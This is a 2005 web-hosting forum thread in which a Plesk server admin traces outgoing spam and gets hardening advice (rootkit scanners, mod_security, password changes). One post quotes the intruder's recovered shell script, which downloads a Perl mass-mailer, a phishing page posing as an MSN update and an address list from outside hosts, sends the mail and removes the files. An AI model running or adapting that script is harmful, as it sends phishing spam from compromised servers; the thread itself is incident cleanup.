1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

sending spam - Trace php mail script on server?

Discussion in 'Plesk for Linux - 8.x and Older' started by ddegroot, Nov 12, 2005.

  1. ddegroot

    ddegroot Guest

    Hi all!

    I got some problems with the email, the mail que is filled with spam. Its stil bussy with removing the spam from the Que. No problem here, just takes some time.

    But is it posseble to trace the page who is sending the spam mails? I can see in the maillog that the spam is being send by the apache user, but not from what site...

    I hope someone can help me with this!

    Thanks in advance.

  2. ShadowMan@

    ShadowMan@ Guest

    Search is your friend. There are numerous things you can/should do.

    1. Install/update/run - RKHunter and CHKRootKit

    2. Check /tmp for any scripts which should not be there.

    3. Check ALL logs for any additional useful info:
    (/home/httpd/ on your system may be /var/www/ )

    Info such as high number of connections by a particular IP address....
    (there is a script posted here somewhere to assist in listing number of connections by IP, was posted not too long ago)

    4. Install/configure mod_security This will go a LONG way towards keeping a lot of **** from getting onto your system, and keeping bad scripts from being able to run.

    5. Change your root and admin passwords, check all user passwords to make sure they are not 'simple' passwords.

    6. Check if any hosted domain is using any scripts (such as phpBB) which have any known exploits/vulnerabilities.

    These are just a few beginning steps, but all should be done if nothing else.

    There is no 'automatic' or 'easy' way to do some of these, other than manually going through and checking each domain. This comes with the job of being a server admin... or a hosting admin...

    It is always easier to secure things beforehand than it is to clean it up afterwards.
  3. ddegroot

    ddegroot Guest

    Thanks for youre help,

    I found a directory /tmp/.sp

    Here where 3 files,
    1 with all the email adresses
    1 with a perl schript
    1 with the mail.

    ---------- 1 apache wheel 981018 Nov 13 03:47 98.txt
    ---------- 1 apache wheel 1098 Nov 8 04:11 enviar.pl
    ---------- 1 apache wheel 10820 Nov 12 21:24 msn.html

    still not shure who put them there, but found the source :)
  4. DennisdeGroot

    DennisdeGroot Guest

    I found the script whitch created the files and downloaded the program. Here is a part of the script. Maybe it is to use of someone. I also found in the log files of a customer the file in thear cgi-bin folder. But it has already been removed.

    cd /tmp
    mkdir .sp
    cd /tmp/.sp
    wget http://morpheusy.bounceme.net/txt/enviar.pl
    wget http://home.graffiti.net/radioterra:graffiti.net/msn.html
    wget http://inep.f5k.com/98.txt
    perl enviar.pl 98.txt "atualizacao@msn.com.br" "Urgente - Atualizacao do Messenger Necessaria - MSN" msn.html
    rm -rf /tmp/.sp

    It was repeating itself sometime. I found it in /tmp/.bash_history. Also fount a file "bash" in "/tmp/.r". Hope this is the end of this spam script.
  5. ShadowMan@

    ShadowMan@ Guest

    Finding and deleting the files (for the moment) is fine. But if you do not do anything to shore up your server from being exploited again, then it will just happen again and again. Please see my earlier post, items 1, 4, 5, and 6. Especially 1, 4 and 5.